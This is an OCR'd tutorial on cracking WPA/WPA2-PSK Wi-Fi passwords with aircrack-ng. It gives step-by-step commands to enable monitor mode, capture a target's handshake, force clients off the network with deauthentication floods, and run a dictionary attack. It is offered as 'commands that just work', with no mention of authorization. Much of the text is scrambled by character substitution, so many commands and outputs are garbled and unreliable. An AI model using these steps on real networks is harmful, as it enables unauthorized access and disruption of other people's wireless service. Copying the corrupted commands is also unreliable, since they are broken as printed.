Crack Wi-Fi with WPA/WPA2-PSK

using Aircrack-ng
This article is a summary of effective commands that just work.
With the help a these commands you will be able to crack WPA/WPA2 Wi-i Access
Pointswhich use P!" #Pre-!hared "ey$ encryption.
The objective is to capture the WPA/WPA2 authentication handshake and then crack the
P!" usin% aircrack-ng.
The full tutorial about WPA/WPA2 crackin% can be found here.
&ere are the basic steps we will be %oin% throu%h'
(. )nstall the latest aircrack-ng
*. !tart the wireless interface in monitor mode usin% airmon-ng
2. !tart airodump-ng on AP channel with filter for +!!), to collect authentication
handshake
-. ./ptional0 1se aireplay-ng to deauthenticate the wireless client
2. 3un aircrack-ng to crack the WPA/WPA2-P!" usin% the authentication handshake
0. Install the Latest Aircrack-ng
)nstall the re4uired dependencies '
$ sudo apt-get install build-essential libssl-dev pkg-config
,ownload and install the latest aircrack-n% '
$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-beta3.tar.gz
$ cd aircrack-ng-1.2-beta3
$ sudo make
$ sudo make install
+e sure to check that the version of aircrack-ng is up-to-date because you may see
problems with older versions.
$ aircrack-ng --help head -3
!ircrack-ng 1.2 beta3 r23"3 - #$% 2&&'-2&13 (homas d)*treppe
http://www.aircrack-ng.org
1. Start the Wireless Interface in !nit!r !"e
ind and stop all processes that could cause trouble '
$ sudo airmon-ng check kill
!tart the wireless interface in monitor mode '
$ sudo airmon-ng start wlan&
5otice that airmon-ng enabled monitor-mode on mon( '
+nterface $hipset ,river
wlan& +ntel '23- iwlwifi - .ph/&0
#monitor mode enabled on mon&%
!o6 the correct interface name to use in later parts of the tutorial is mon(.
2. Start Air!"u#$-ng t! C!llect Authenticati!n
%an"shake
&!w' when !ur wireless a"a$ter is in #!nit!r #!"e' we ha(e the ca$a)ilit* t!
see all the wireless traffic that $asses )* in the air.
)t can be done with airodump-ngcommand '
$ sudo airodump-ng mon&
All of the visible APs are listed in the upper part of the screen and the clients are listed in
the lower part of the screen '
$1 1 0. 2lapsed: 2& s 0. 2&13-&--2" 12:3'
455+, 678 4eacons 9,ata: 9/s $1 ;4 2<$ $+6128 !=(1 255+,
&&:11:22:33:33:-- -3> 212 1-3' '' 1 -3e 76!2 $$;6 65?
$rack;e
'':@@:>>:"":&&:11 -'3 133 33- 33 1 -3e 76!2 $$;6 65? 5ome!6
455+, 5(!(+*< 678 8ate Aost Brames 6robe
&&:11:22:33:33:-- !!:44:$$:,,:22:BB -33 & - 1 113 -'
&&:11:22:33:33:-- CC:11:++:DD:??:AA -@> & - 1 & 1
'':@@:>>:"":&&:11 ;;:<<:**:66:EE:88 -@> 2 - 32 & 1
5ow start airodump-ng on AP channel with filter for +!!), to collect authentication
handshake for the access point we are interested in '
7 sudo airodump-n% -c * --bssid (('**'22'--'22'88 -w WPAcrack mon( 9i%nore-ne%ative-one
+$ti!n ,escri$ti!n
-c The channel for the wireless network
--bssid The :A; address of the access point
-w
The file name prefi< for the file which will contain
authentication handshake
mon( The wireless interface
--i%nore-ne%ative-
one
3emoves =fi<ed channel
5ow wait until airodump-ng captures a handshake... or %o to the step >- if you want to
force this process.
After some time you=ll notice the in the top ri%ht-hand corner of the screen.
This means airodump-ng has successfully captured the handshake.
$1 1 0. 2lapsed: 2& s 0. 2&13-&--2" 12:3' 76! handshake: &&:11:22:33:33:--
455+, 678 4eacons 9,ata: 9/s $1 ;4 2<$ $+6128 !=(1 255+,
&&:11:22:33:33:-- -3> 212 1-3' '' 1 -3e 76!2 $$;6 65?
$rack;e
455+, 5(!(+*< 678 8ate Aost Brames 6robe
&&:11:22:33:33:-- !!:44:$$:,,:22:BB -33 & - 1 113 -'
-. .+$ti!nal/ 0se Aire$la*-ng t!
,eauthenticate the Wireless Client
This step is optional. )f you can=t wait till airodump-ng captures a handshake6 you can
send a messa%e to the wireless client sayin% that it is no lon%er associated with the AP.
The wireless client will then hopefully reauthenticate with the AP and we=ll capture the
authentication handshake.
!end ,eAuth to broadcast '
$ sudo airepla/-ng --deauth 1&& -a &&:11:22:33:33:-- mon& --ignore-negative-one
!end directed ,eAuth #attack is more effective when it is tar%eted$ '
$ sudo airepla/-ng --deauth 1&& -a &&:11:22:33:33:-- -c !!:44:$$:,,:22:BB mon& --ignore-
negative-one
+$ti!n ,escri$ti!n
--deauth *((
The number of de-authenticate frames you want to
send #( for unlimited$
-a The :A; address of the access point
-c The :A; address of the client
mon( The wireless interface
--i%nore-ne%ative-
one
3emoves =fi<ed channel
1. 2un Aircrack-ng t! Crack WPA/WPA2-PSK
To crack WPA/WPA2-P!"6 you need a password dictionary as input. ?ou can download
some dictionaries from here.
;rack the WPA/WPA2-P!" with the followin% command '
$ aircrack-ng -w wordlist.dic -b &&:11:22:33:33:-- 76!crack.cap
+$ti!n ,escri$ti!n
-w The name of the dictionary file
-b The :A; address of the access point
WPAcrack.c
ap
The name of the file that contains the authentication
handshake
!ircrack-ng 1.2 beta3 r23"3
.&&:&>:110 -3>>@2 ke/s tested #132-.23 k/s%
?2F B*=<,G . ">@'-3321 0
;aster ?e/ : -$ ", 3B 4' 23 34 32 &B B@ $2 -1 2@ ,3 ,3 &2 "@
$4 B& 3! 2> && "3 3! >2 ,, &3 @@ !3 !1 @, 1- ,-
(ransient ?e/ : 3! 32 2@ -2 >' $3 &1 !> "1 -! 2, @$ "@ @1 ,2 B>
!! &3 >- "" -$ 4B !@ 32 -4 2B $, "3 $& -4 4- B'
,4 !3 $@ 33 '2 B3 11 33 $' ,! 4! 3> 2" @2 3, 4"
!3 11 3@ !' >B "& '3 3' 14 &3 >" @2 @" "" 21 43
2!6*A 1;!$ : "B 4- B3 4" 3$ >4 2! ,B !& 32 B3 ,3 ", B- 1' '2